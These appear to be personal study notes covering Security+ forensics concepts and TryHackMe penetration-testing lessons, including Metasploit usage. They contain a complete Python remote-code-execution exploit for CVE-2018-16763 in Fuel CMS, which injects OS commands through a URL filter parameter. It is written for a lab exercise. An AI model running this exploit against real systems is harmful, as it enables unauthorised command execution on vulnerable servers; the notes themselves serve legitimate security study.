ITPro.TV: CompTIA Security+ (SY0-601) & TryHackMe: Jr. Penetration Tester
- author:: Nathan Acks
- date:: 2022-04-13
ITPro.TV: CompTIA Security+ (SY0-601)
Digital Forensics Concepts
Order of volatility:
- CPU cache & registers (good luck!)
- Routing tables, process tables, ARP cache, kernel stats
- (Non-Kernel) RAM
- Swap, /tmp, etc.
- Storage, VM snapshots
- Archival data, backups, logs, print-outs
Preservation and documentation notes:
- Timestamp everything
- Note timezone differences
- Written reports and logs (also use these to establish the chain of custody)
- Witness testimony
- Use file hashes
Chain of custody is often represented as a simple paper log/form.
Tools of the trade:
- FTK Imager
- WinHex
- Autopsy
- EnCase Forensic
dd
TryHackMe: Jr. Penetration Tester
Vulnerability Capstone
I couldn’t get any of the exploits from Exploit DB to work for me, so I wound up doing a web search that landed me on a write-up for this room in GitHub; the provided exploit code is a little rough, but can be cleaned up to produce nice output without too much work:
#!/usr/bin/python3
# Derived from https://github.com/SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763/blob/main/rce.py
import argparse
import requests
from sys import exit
from bs4 import BeautifulSoup
from socket import error
delimeter1 = '<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">'
delimeter2 = '</div>'
def exploit():
while True:
try:
payload = input("
[+] OS Command: ")
response = requests.get(f"{args.URL}/fuel/pages/select/?filter='%2Bpi(%24a%3D('system'))%2B%24a('{payload}')%2B'")
htmlText = str(BeautifulSoup(response.text,'html.parser'))
array1 = htmlText.split(delimeter1)
array2 = array1[1].split(delimeter2)
print('
' + array2[-1].replace('
',''))
except error:
exit('
[-] Could Not Connect To Server')
if __name__ == '__main__':
mainArguments = argparse.ArgumentParser()
mainArguments.add_argument('URL',help='Target Website Hosting Vulnerable CMS',type=str)
args = mainArguments.parse_args()
try:
exploit()
except KeyboardInterrupt:
exit('
[!] Quitting')
- THM-Vulnerability_Capstone-CVE-2018-16763
- THM-Vulnerability_Capstone-CVE-2018-16763 / rce.py
- Python String split() Method
- Replace all newline characters using python
Main Components of Metasploit
Module categories:
- Auxiliary (odds-n-ends)
- Encoders (re-encode exploits to thwart signature-based anti-malware solutions)
- Evasion (attempt to directly evade anti-malware solutions)
- Exploits
- NOPS (no-op code that can be used to pad exploits to a needed size)
- Payloads (what you want to run if the exploit is successful; often, but not always, some kind of shell)
- Post (additional post-exploitation tools)
Payloads, in turn, can be divided into:
- Singles (self-contained; also indicated by the use of an
_
separating “shell” from the rest of the payload name, as inshell_reverse_tcp
) - Stagers (small applications that establish a connection back to the attacker to download a larger, more complex payload)
- Stages (payloads designed to be downloaded by a stager; also indicated by the use of a
/
separating “shell” from the rest of the payload name, as inshell/reverse_tcp
)
Msfconsole
You can use msfconsole as a shell, but there’s no redirect functionality.
Use history
to display a command history.
All settings are scoped to the current module unless explicitly scoped globally (set -g
).
The show
command can be used with any module type to list modules of that type, though Metasploit is a bit inconsistent about whether the type should be plural or not (show auxiliary
vs. show exploits
). When used in the context of a module, this usage of show
will attempt to filter additional modules in a sensible way; for example, in the context of a Windows exploit, only Windows-based payloads will be shown.
The back
command leaves the context of the current module.
Use info
to get module information (which is not generally the same as “help”, though it often does contain useful informaiton).
We can limit the search
query to a particular type of module using the type:
parameter (e.g., search type:exploit wordpress
).
Working with Modules
The common RHOSTS
module option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as file:/path/to/file.txt
).
Note that the PAYLOAD
and SESSION
parameters are not generally listed by show options
, but can still be set if desired.
You can reset individual parameters using unset
, and reset the entire module using unset all
.
set -g
=setg
unset -g
=unsetg
run
=exploit
Some exploit modules have a check
option which attempts to determine if a target is vulnerable without actually exploiting it. Alternately, other modules have a paired auxiliary scanner. Many don’t have a check at all. YMMV!
Meterpreter sessions can be backgrounded using the background
command, and all sessions can be backgrounded using CTRL + Z
. List sessions using the sessions
command, and foreground a session using session -i #
, where #
is the session number.